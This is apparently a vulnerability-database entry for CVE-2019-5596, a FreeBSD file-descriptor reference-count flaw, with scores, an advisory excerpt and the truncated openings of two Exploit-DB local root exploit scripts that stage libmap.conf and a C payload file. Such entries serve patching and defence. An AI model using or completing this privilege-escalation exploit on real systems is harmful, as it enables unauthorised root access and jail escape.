CVE-2019-5596
Published 2019-02-12
Priority P351 · high · 8.8 CVSS 3.0
AV:L / AC:L / PR:L / UI:N / S:C / C:H / I:H / A:H
EXPLOIT
EPSS: 1.23% (65.2th percentile)
In FreeBSD 11.2-STABLE after r338618 and before r343786, 12.0-STABLE before r343781, and 12.0-RELEASE before 12.0-RELEASE-p3, a bug in the reference count implementation for UNIX domain sockets can cause a file structure to be incorrectly released potentially allowing a malicious local user to gain root privileges or escape from a jail.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
CVSS provenance
nvd · v3.0 · 8.8 HIGH · CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvd · v2.0 · 7.2 HIGH · AV:L/AC:L/Au:N/C:C/I:C/A:C
GHSA
GHSA-89xf-9vcr-5475: In FreeBSD 11
ghsa_unreviewed·2022-05-13
BSD
FreeBSD-SA-19:02.fd: File description reference count leak
bsd_advisories·2019-02-05·CVSS 8.8
FreeBSD-SA-19:02.fd Security Advisory
The FreeBSD Project
Topic: File description reference count leak
Category: core
Module: unix
Announced: 2019-02-05
Credits: Peter Holm
Affects: FreeBSD 12.0
Corrected: 2019-02-05 17:56:22 UTC (stable/12, 12.0-STABLE)
2019-02-05 18:11:15 UTC (releng/12.0, 12.0-RELEASE-p3)
2019-02-05 17:57:30 UTC (stable/11, 11.2-STABLE)
CVE Name: CVE-2019-5596
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .
I. Background
UNIX-domain sockets are used for inter-process communication. It is
possible to use UNIX-domain sockets to transfer rights, encoded as file
descriptors, to another process.
II. Problem Description
FreeBSD 12.0 attempts to handl
No detection rules found.
Exploit-DB
FreeBSD-SA-19:02.fd - Privilege Escalation
exploitdb·2019-12-30·CVSS 8.8
---
# Exploit: FreeBSD-SA-19:02.fd - Privilege Escalation
# Date: 2019-12-30
# Author: Karsten König of Secfault Security
# Twitter: @gr4yf0x
# Kudos: Maik, greg and Dirk for discussion and inspiration
# CVE: CVE-2019-5596
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
#!/bin/sh
echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"
umask 0000
if [ ! -f /etc/libmap.conf ]; then
echo "[!] libmap.conf has to exist"
exit
fi
cp /etc/libmap.conf ./
cat > heavy_cyber_weapon.c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define N_FDS 0xfe
#define N_OPEN 0x2
#define N 1000000
#define NUM_THREADS 400
#define NUM_
Exploit-DB
FreeBSD 12.0 - 'fd' Local Privilege Escalation
exploitdb·2019-07-10
---
#!/bin/sh
# Exploit script for FreeBSD-SA-19:02.fd
#
# Author: Karsten König of Secfault Security
# Contact: [email protected]
# Twitter: @gr4yf0x
# Kudos: Maik, greg and Dirk for discussion and inspiration
#
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"
umask 0000
if [ ! -f /etc/libmap.conf ]; then
echo "[!] libmap.conf has to exist"
exit
fi
cp /etc/libmap.conf ./
cat > heavy_cyber_weapon.c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define N_FDS 0xfe
#define N_OPEN 0x2
#define N 1000000
#define NUM_THREADS 400
#define NUM_FORK
No writeups or analysis indexed.